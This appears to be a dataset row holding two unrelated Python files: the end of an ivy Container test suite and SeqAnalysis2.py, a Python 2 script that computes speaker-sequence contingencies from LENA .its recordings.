                    "c": ivy.array([[[2.0, 3.0], [4.0, 5.0], [6.0, 7.0]]], device=device),
                    "d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
                },
            },
            [1, 3, None],  # last dim disagrees across leaves
        ),
        (
            {
                "a": ivy.array([[[1.0, 2.0], [2.0, 3.0], [3.0, 4.0]]], device=device),
                "b": {
                    "c": ivy.array([[[2.0, 3.0], [4.0, 5.0], [6.0, 7.0]]], device=device),
                    "d": ivy.array([[[3.0, 4.0], [6.0, 7.0], [9.0, 10.0]]], device=device),
                },
            },
            [1, 3, 2],
        ),
    ]
    for dict_in, expected in cases:
        assert Container(dict_in).shape == expected
def test_container_shapes(device, call):
    """Container.shapes reports each leaf's own shape at its key chain."""
    shapes = Container(
        {
            "a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
            "b": {
                "c": ivy.array([[[2.0], [4.0]]], device=device),
                "d": ivy.array([[9.0]], device=device),
            },
        }
    ).shapes
    assert list(shapes["a"]) == [1, 3, 1]
    assert list(shapes.a) == [1, 3, 1]
    assert list(shapes["b"]["c"]) == [1, 2, 1]
    assert list(shapes.b.c) == [1, 2, 1]
    assert list(shapes["b"]["d"]) == [1, 1]
    assert list(shapes.b.d) == [1, 1]
def test_container_dev_str(device, call):
    """Container.dev_str reflects the device all of its leaves live on."""
    cont = Container(
        {
            "a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
            "b": {
                "c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
                "d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
            },
        }
    )
    assert cont.dev_str == device
def test_container_create_if_absent(device, call):
    """create_if_absent must leave existing keys alone and add missing ones.

    Consistency fix: all inserted values are now `ivy.array(..., device=device)`
    like the rest of this suite; previously one value was a device-less
    ivy array and another a raw numpy array.
    """
    dict_in = {
        "a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
        "b": {
            "c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
            "d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
        },
    }
    # depth 1: an existing key must not be overwritten, even by None
    container = Container(dict_in)
    container.create_if_absent("a", None, True)
    assert np.allclose(ivy.to_numpy(container.a), np.array([[[1.0], [2.0], [3.0]]]))
    container.create_if_absent(
        "e", ivy.array([[[4.0], [8.0], [12.0]]], device=device), True
    )
    assert np.allclose(ivy.to_numpy(container.e), np.array([[[4.0], [8.0], [12.0]]]))
    # depth 2: a nested "f/g" path must be created on demand
    container.create_if_absent(
        "f/g", ivy.array([[[5.0], [10.0], [15.0]]], device=device), True
    )
    assert np.allclose(ivy.to_numpy(container.f.g), np.array([[[5.0], [10.0], [15.0]]]))
def test_container_if_exists(device, call):
    """if_exists returns the value for present top-level keys, else None."""
    expected = np.array([[[1.0], [2.0], [3.0]]])
    cont = Container(
        {
            "a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
            "b": {
                "c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
                "d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
            },
        }
    )
    assert np.allclose(ivy.to_numpy(cont.if_exists("a")), expected)
    # "c" exists only nested under "b", not at the top level.
    assert "c" not in cont
    assert cont.if_exists("c") is None
    cont["c"] = ivy.array([[[1.0], [2.0], [3.0]]], device=device)
    assert np.allclose(ivy.to_numpy(cont.if_exists("c")), expected)
    assert cont.if_exists("d") is None
    cont.d = ivy.array([[[1.0], [2.0], [3.0]]], device=device)
    assert np.allclose(ivy.to_numpy(cont.if_exists("d")), expected)
def test_jax_pytree_compatibility(device, call):
    """A Container must flatten as a JAX pytree exactly like the raw dict."""
    if call is not helpers.jnp_call:
        pytest.skip()
    from jax.tree_util import tree_flatten

    dict_in = {
        "a": ivy.array([1], device=device),
        "b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
    }
    cont_leaves, _ = tree_flatten(Container(dict_in))
    dict_leaves, _ = tree_flatten(dict_in)
    # Leaves must come out in the same order with the same values.
    for cont_leaf, dict_leaf in zip(cont_leaves, dict_leaves):
        assert np.array_equal(ivy.to_numpy(cont_leaf), ivy.to_numpy(dict_leaf))
def test_container_from_queues(device, call):
    """Exercise a Container backed by multiprocessing output queues.

    Three workers feed queues with load sizes [1, 2, 1]; container indices
    0, 1-2 and 3 therefore map to workers 1, 2 and 3.  Indexing must raise
    queue.Empty until the matching worker has produced, then return (and
    retain) that worker's data on repeated access.
    """
    if "gpu" in device:
        # Cannot re-initialize CUDA in forked subprocess. 'spawn'
        # start method must be used.
        pytest.skip()
    if ivy.gpu_is_available() and call is helpers.jnp_call:
        # Not found a way to set default device for JAX, and this causes
        # issues with multiprocessing and CUDA, even when device=cpu
        # ToDo: find a fix for this problem ^^
        pytest.skip()
    def worker_fn(in_queue, out_queue, load_size, worker_id):
        # Each message on in_queue is a bool: True -> produce one batch,
        # False -> shut down. worker_id scales the produced values so the
        # assertions below can tell which worker produced what.
        keep_going = True
        while keep_going:
            try:
                keep_going = in_queue.get(timeout=0.1)
            except queue.Empty:
                continue
            out_queue.put(
                {
                    "a": [
                        ivy.to_native(ivy.array([1.0, 2.0, 3.0], device=device))
                        * worker_id
                    ]
                    * load_size
                }
            )
    workers = list()
    in_queues = list()
    out_queues = list()
    queue_load_sizes = [1, 2, 1]
    # Spawn one worker process per queue; worker ids are 1-based.
    for i, queue_load_size in enumerate(queue_load_sizes):
        input_queue = multiprocessing.Queue()
        output_queue = multiprocessing.Queue()
        worker = multiprocessing.Process(
            target=worker_fn, args=(input_queue, output_queue, queue_load_size, i + 1)
        )
        worker.start()
        in_queues.append(input_queue)
        out_queues.append(output_queue)
        workers.append(worker)
    container = Container(
        queues=out_queues, queue_load_sizes=queue_load_sizes, queue_timeout=0.25
    )
    # queue 0
    # Before the worker is told to produce, indexing must time out empty.
    queue_was_empty = False
    try:
        container[0]
    except queue.Empty:
        queue_was_empty = True
    assert queue_was_empty
    in_queues[0].put(True)
    # The second identical access checks the fetched item is retained.
    assert np.allclose(ivy.to_numpy(container[0].a), np.array([1.0, 2.0, 3.0]))
    assert np.allclose(ivy.to_numpy(container[0].a), np.array([1.0, 2.0, 3.0]))
    # queue 1
    queue_was_empty = False
    try:
        container[1]
    except queue.Empty:
        queue_was_empty = True
    assert queue_was_empty
    queue_was_empty = False
    try:
        container[2]
    except queue.Empty:
        queue_was_empty = True
    assert queue_was_empty
    in_queues[1].put(True)
    # Worker 2 has load size 2, so indices 1 and 2 both resolve to it.
    assert np.allclose(ivy.to_numpy(container[1].a), np.array([2.0, 4.0, 6.0]))
    assert np.allclose(ivy.to_numpy(container[1].a), np.array([2.0, 4.0, 6.0]))
    assert np.allclose(ivy.to_numpy(container[2].a), np.array([2.0, 4.0, 6.0]))
    assert np.allclose(ivy.to_numpy(container[2].a), np.array([2.0, 4.0, 6.0]))
    # queue 2
    queue_was_empty = False
    try:
        container[3]
    except queue.Empty:
        queue_was_empty = True
    assert queue_was_empty
    in_queues[2].put(True)
    assert np.allclose(ivy.to_numpy(container[3].a), np.array([3.0, 6.0, 9.0]))
    assert np.allclose(ivy.to_numpy(container[3].a), np.array([3.0, 6.0, 9.0]))
    # stop workers
    in_queues[0].put(False)
    in_queues[1].put(False)
    in_queues[2].put(False)
    in_queues[0].close()
    in_queues[1].close()
    in_queues[2].close()
    # join workers
    for worker in workers:
        worker.join()
    del container
|
SeqAnalysis2.py | """
The MIT License (MIT)
Copyright (c) 2017 Paul Yoder, Joshua Wade, Kenneth Bailey, Mena Sargios, Joseph Hull, Loraina Lampley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import xml.etree.ElementTree as ET
from copy import deepcopy
import os
import threading
import Queue
from Helpers import *
import math
# Event Item
class EItem:
    """One speaker event: who spoke (spkr) plus onset/offset time strings."""

    def __init__(self, attr):
        # attr is a segment attribute mapping with 'spkr', 'startTime',
        # and 'endTime' keys (e.g. an XML element's .attrib).
        self.spkr = attr["spkr"]
        self.onset = attr["startTime"]
        self.offset = attr["endTime"]

    def GetFloatTime(self, arg='onset'):
        """Return the onset (default) or offset as a float.

        Strips the first two characters and the trailing one before
        converting, which assumes a 'PT<seconds>S'-style stamp --
        TODO confirm against the .its time format.
        """
        if arg == 'onset':
            stamp = self.onset
        else:
            stamp = self.offset
        return float(stamp[2:-1])
# Event Item List
class EItemList:
    """Builds the ordered list of relevant events from an .its file and runs
    the sequential (contingency) analysis over it.

    _varMap keys used: "seqType", "A", "B", "C", "P", "PauseDur",
    "roundingEnabled".  NOTE: pid is concatenated into a CSV row by
    ResultsTuple(), so callers should pass it as a string.
    """

    def __init__(self, _varMap=None, pid=0, its_filename=''):
        # Fixed: the original default was a shared mutable dict ({});
        # a None sentinel avoids cross-instance aliasing.
        self._varMap = {} if _varMap is None else _varMap
        self.list = []    # final event list
        self.list_ = []   # interim list used by InsertPauses()
        self.seqType = self._varMap["seqType"]
        self.pid = pid
        self.its_filename = its_filename
        # Comma-joined labels of relevant speakers.  Membership checks below
        # are SUBSTRING tests against this string, so a label that is a
        # substring of another (e.g. 'AN' vs 'FAN') also matches -- this
        # original behavior is preserved as-is.
        self.relevantSpkrs = self._varMap["A"] + ',' + self._varMap["B"] + ',' + self._varMap["C"] + ',Pause'
        self.pauseDur = float(self._varMap["PauseDur"])
        self.eventCnt = {"A": 0, "B": 0, "C": 0, "P": 0}
        self.evTypes = ["A", "B", "C", "P"]
        # 2x2 contingency table: a = A then B, b = A then not-B,
        # c = not-A then B, d = not-A then not-B.
        self.contingencies = {"a": 0, "b": 0, "c": 0, "d": 0}
        # Simplified from 'True if "True" in ... else False'.
        self.round = "True" in self._varMap["roundingEnabled"]

    def AddEItem(self, seg, flag=None):
        """Append seg (an XML segment element) as an EItem if its speaker is relevant.

        flag is 'Initial'/'Terminal' for the first/last segment of the file;
        those are coerced to a Pause when the speaker is not relevant so the
        list always begins and ends with a tracked event.
        """
        # Specify CHN events as either CHNSP or CHNNSP events.
        if 'CHN' in seg.attrib["spkr"]:
            seg.attrib["spkr"] = self.Modify_CHN_Events(seg)
        # Fixed: original compared string literals with 'is' (identity);
        # equality via 'in' tuple is the correct and portable form.
        if flag in ('Initial', 'Terminal') and seg.attrib["spkr"] not in self.relevantSpkrs:
            seg.attrib["spkr"] = "Pause"
        if seg.attrib["spkr"] in self.relevantSpkrs:
            self.list.append(EItem(seg.attrib))

    def Modify_CHN_Events(self, seg):
        """Classify a CHN segment: CHNSP if it carries utterances, else CHNNSP."""
        return 'CHNSP' if 'startUtt1' in seg.attrib else 'CHNNSP'

    def Size(self):
        """Number of events currently held."""
        return len(self.list)

    def GetItem(self, index):
        """Return the EItem at index."""
        return self.list[index]

    def InsertPauses(self):
        """Rebuild self.list with explicit Pause events covering every
        inter-event gap of at least pauseDur seconds."""
        self.list_.append(deepcopy(self.list[0]))
        for i in range(1, self.Size()):
            # Determine whether to add pause(s) before copying the event.
            curEvT = self.list[i].GetFloatTime('onset')
            preEvT = self.list[i - 1].GetFloatTime('offset')
            gap = curEvT - preEvT
            P = self.pauseDur
            if gap >= P:
                # Number of pause slots that fit in the gap; 0 when P == 0
                # (mirrors the original ZeroDivisionError fallback).
                if P == 0:
                    numP = 0
                elif self.round:
                    numP = int((gap / P) + .5)   # round to nearest
                else:
                    numP = int(gap / P)          # truncate
                for j in range(numP):
                    startTime = preEvT + (j * P)
                    endTime = min(curEvT, startTime + P)
                    # NOTE(review): these plain-number time strings would be
                    # mis-parsed by GetFloatTime's [2:-1] slice, but
                    # GetFloatTime is never called after this point in this
                    # module, so behavior is unaffected.
                    pAttr = {"spkr": "Pause", "startTime": str(startTime), "endTime": str(endTime)}
                    self.list_.append(EItem(pAttr))
            # Add the current event itself.
            self.list_.append(deepcopy(self.list[i]))
        # Swap in the rebuilt list and free the interim one.
        self.list = deepcopy(self.list_)
        self.list_ = None

    def TallyItems(self):
        """Tally each event into eventCnt by (substring) speaker match."""
        for item in self.list:
            for e in self.evTypes:
                if item.spkr in self._varMap[e]:
                    self.eventCnt[e] += 1

    def SeqAn(self):
        """Populate the contingency table for the configured sequence type."""
        numItems = self.Size()
        if self._varMap['seqType'] == 'A_B':
            # A-->B: classify each adjacent pair of events.
            print('A-->B Analysis in progress...')
            for i in range(numItems - 1):
                curr = self.list[i]
                nxt = self.list[i + 1]  # renamed from 'next' (shadowed builtin)
                inA = curr.spkr in self._varMap["A"]
                inB = nxt.spkr in self._varMap["B"]
                if inA and inB:
                    self.contingencies["a"] += 1
                elif inA and not inB:
                    self.contingencies["b"] += 1
                elif not inA and inB:
                    self.contingencies["c"] += 1
                else:
                    self.contingencies["d"] += 1
        elif self._varMap['seqType'] == 'AB_C':
            # (A-->B)-->C: classify each triple of consecutive events.
            print('(A-->B)-->C Analysis in progress...')
            for i in range(numItems - 2):
                curr = self.list[i]
                nextB = self.list[i + 1]
                nextC = self.list[i + 2]
                inAB = curr.spkr in self._varMap["A"] and nextB.spkr in self._varMap["B"]
                inC = nextC.spkr in self._varMap["C"]
                if inAB and inC:
                    self.contingencies["a"] += 1
                elif inAB and not inC:
                    self.contingencies["b"] += 1
                elif not inAB and inC:
                    self.contingencies["c"] += 1
                else:
                    self.contingencies["d"] += 1

    def Header(self):
        """Return the CSV header row matching ResultsTuple()'s columns."""
        h = 'PID,its_filename,'
        # One column per event type, named by its configured label(s).
        for e in self.evTypes:
            h += self._varMap[e].replace(",", "+") + ','
        h += 'a,b,c,d,OCV'
        return h

    def ResultsTuple(self):
        """Return one CSV row: pid, filename, event counts, contingencies, OCV.

        NOTE: raises ZeroDivisionError when (a+b) or (c+d) is zero; the
        caller (SeqAnalysis.Perform) catches all exceptions and records them
        as error results, so this is left unguarded to preserve behavior.
        """
        rt = self.pid + ',' + self.its_filename.split('/')[-1] + ','
        for e in self.evTypes:
            rt += str(self.eventCnt[e]) + ','
        # Tokens used for OCV computation.
        tok_a = float(self.contingencies["a"])
        tok_b = float(self.contingencies["b"])
        tok_c = float(self.contingencies["c"])
        tok_d = float(self.contingencies["d"])
        # OCV (operant contingency value): P(B|A) - P(B|not A).
        OCV = (tok_a / (tok_a + tok_b)) - (tok_c / (tok_c + tok_d))
        rt += str(self.contingencies["a"]) + ',' + str(self.contingencies["b"]) + ',' + str(self.contingencies["c"]) + ',' + str(self.contingencies["d"]) + ',' + str(OCV)
        return rt
class SeqAnalysis:
    """Runs the sequential analysis over every .its file in seqData.

    All work happens in the constructor: files are popped off
    seqData.its_dict and processed in batches of seqData.num_threads
    daemon threads (one Perform() call per file); the accumulated CSV
    rows are then written in the requested output format(s).

    NOTE(review): this module uses Python 2 syntax (print statements,
    dict.iteritems); it will not run unmodified on Python 3.
    """
    def __init__(self, seqData, out_results, stopper):
        # seqData: provides seq_config (variable map), its_dict (pid -> path),
        #   num_threads, and output_format.
        # out_results: shared list; one status string is appended at the end.
        # stopper: threading.Event -- when set, workers do nothing and the
        #   output-writing step is skipped.
        # extract items from seqData object
        self.varMap = seqData.seq_config
        # prime for writing output
        batch_single = None
        if len(seqData.its_dict) > 1:
            batch_single = "Batch"
        else:
            batch_single = "Single"
        # setup vars
        self.results = []        # CSV rows (header row first); guarded by tLock
        self.out_results = out_results
        self.error_results = []  # stringified exceptions from worker threads
        self.stopper = stopper
        self.tLock = threading.Lock()
        # kick off threads in batch
        while len(seqData.its_dict) > 0:
            # prep for run
            tempItem = {}
            tempDict = {}
            threads = []
            # Pop up to num_threads work items off its_dict for this batch.
            for i in range(seqData.num_threads):
                try:
                    tempItem = seqData.its_dict.popitem()
                    tempDict.update({tempItem[0]:tempItem[1]})
                except KeyError:
                    pass # dict is empty
            # perform run
            for k,v in tempDict.iteritems():
                t = threading.Thread(target=self.Perform, args=(k,v,))
                t.daemon = True
                threads.append(t)
                t.start()
            # wait for threads
            for thread in threads:
                thread.join()
        if not stopper.is_set():
            # write output
            output_data = OutData(batch_single, seqData.seq_config,self.results)
            if '.xlsx' in seqData.output_format:
                output_xlsx(output_data)
            if '.csv' in seqData.output_format:
                output_csv(output_data)
            if '.txt' in seqData.output_format:
                # NOTE(review): 'ouput_txt' looks misspelled -- confirm this is
                # the actual helper name exported by Helpers before renaming.
                ouput_txt(output_data)
            # report analysis result
            if len(self.error_results) > 0:
                self.out_results.append("Failed Sequence Analysis!")
            else:
                # NOTE(review): message reads awkwardly ("Successfully Sequence
                # Analysis!") but is runtime output, so left unchanged here.
                self.out_results.append("Successfully Sequence Analysis!")
    def Perform(self, pID, path):
        """Worker: analyze one .its file and append its CSV row to results.

        Any exception is caught and recorded in error_results (under tLock),
        so a bad file fails its own row without killing the batch.
        """
        # retrieve work items from queue
        if not self.stopper.is_set():
            try:
                # Announce
                print 'Analysis in progress on pID=' + str(pID) + ', file=' + path
                # Define necessary objects
                eiList = None
                tree = None
                # INITIALIZE ESSENTIAL OBJECTS
                #Init event item list
                eiList = EItemList(_varMap=self.varMap, pid=pID, its_filename=path)
                #Load xml tree
                tree = ET.parse(path)
                #Get access to only the conversational segments in the .its file
                recNode = tree.find("ProcessingUnit")
                segs = list(recNode.iter("Segment"))
                # iterate over segments and copy
                eiList.AddEItem( segs[0], flag='Initial' )
                for i in range(1, len(segs)-1):
                    eiList.AddEItem( segs[i] )
                eiList.AddEItem( segs[-1], flag='Terminal' )
                # free memory used by xml tree
                tree = None
                #Insert contiguous pauses
                eiList.InsertPauses()
                #Tally each item in the EItemList
                eiList.TallyItems()
                #Perform primary analysis
                eiList.SeqAn()
                #write data and break from loop
                elh = eiList.Header()
                outputContent = ""
                with self.tLock:
                    # First finisher contributes the shared header row.
                    if len(self.results) == 0:
                        self.results.append(elh)
                outputContent += eiList.ResultsTuple()
                # write data with Lock on results
                with self.tLock:
                    self.results.append(outputContent)
            # Log All Errors
            except Exception as e:
                with self.tLock:
                    self.error_results.append(str(e))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.